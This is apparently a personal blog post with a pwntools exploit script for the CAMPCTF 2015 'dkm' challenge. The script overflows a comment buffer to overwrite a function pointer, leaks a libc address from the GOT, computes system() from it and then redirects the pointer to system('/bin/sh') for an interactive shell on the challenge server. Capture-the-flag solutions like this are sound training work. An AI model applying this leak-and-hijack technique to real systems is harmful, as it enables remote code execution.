CAMPCTF 2015 dkm

Games/CTF 2015. 11. 19. 02:39

#!/usr/bin/env python

from pwn import *

context.arch = 'amd64'

elf = ELF('dkm.elf')

puts = elf.got['__libc_start_main']


#r = remote("localhost", 5555)

r = remote("challs.campctf.ccc.ac", 10102)

r.recvuntil('> ')


def send_menu(r, s):

r.send(s+'\n')

print r.recvuntil('> ')


send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0') # number of ssid

send_menu(r, 'no comment')


send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '2')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')


send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')


send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')


libc_start_addr = 0

SYSTEM_OFFSET = 0x23a80 # libc_start - system. brute force this offset!

show_with_wifi = 0x4009F0


# stage1> leak got

comment = 'A'*0x310

comment += pack(0) # latitude

comment += pack(0) # longitude

comment += pack(show_with_wifi) # show with wifi

comment += pack(0xdeadbeef) # edit

comment += pack(puts) # &got.puts

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

leak = r.recvuntil('> ')

print leak

leak = leak.split('SSID: ')[1]

libc_start_addr = int(leak[:6][::-1].encode('hex'), 16)

system_addr = libc_start_addr + SYSTEM_OFFSET

print 'libc_start at -{0}-'.format(hex(libc_start_addr))

print 'system at -{0}-'.format(hex(system_addr))


# stage2> jmp to system

send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

comment = 'A'*0x310

comment += '/bin/sh\0' # latitute -> "/bin/sh"

comment += pack(0) # longitude

comment += pack(system_addr) # chage show to system

comment += pack(0xdeadbeef) # edit

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

r.interactive()

'Games > CTF' 카테고리의 다른 글

PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19
CAMPCTF 2015 dkm  (0) 2015.11.19
PlaidCTF 2015 RAM  (0) 2015.11.18
화이트햇 콘테스트 2015 한글 익스플로잇 분석  (6) 2015.10.27
EKO CTF pwn200  (0) 2015.09.17
Posted by daehee87

댓글을 달아 주세요